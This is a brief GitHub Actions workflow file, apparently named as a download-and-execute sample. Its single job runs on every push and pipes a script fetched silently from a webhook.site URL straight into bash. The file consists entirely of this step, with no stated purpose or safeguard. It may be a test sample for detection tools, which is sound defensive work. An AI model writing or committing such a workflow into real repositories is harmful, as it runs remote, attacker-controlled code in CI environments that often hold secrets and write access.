name: g1-m3-dl-exec
on:
  push: {}
jobs:
  x:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -s https://webhook.site/ae1c7580-8d42-440e-82c4-4746ccb71ad5/s.sh | bash
        shell: bash
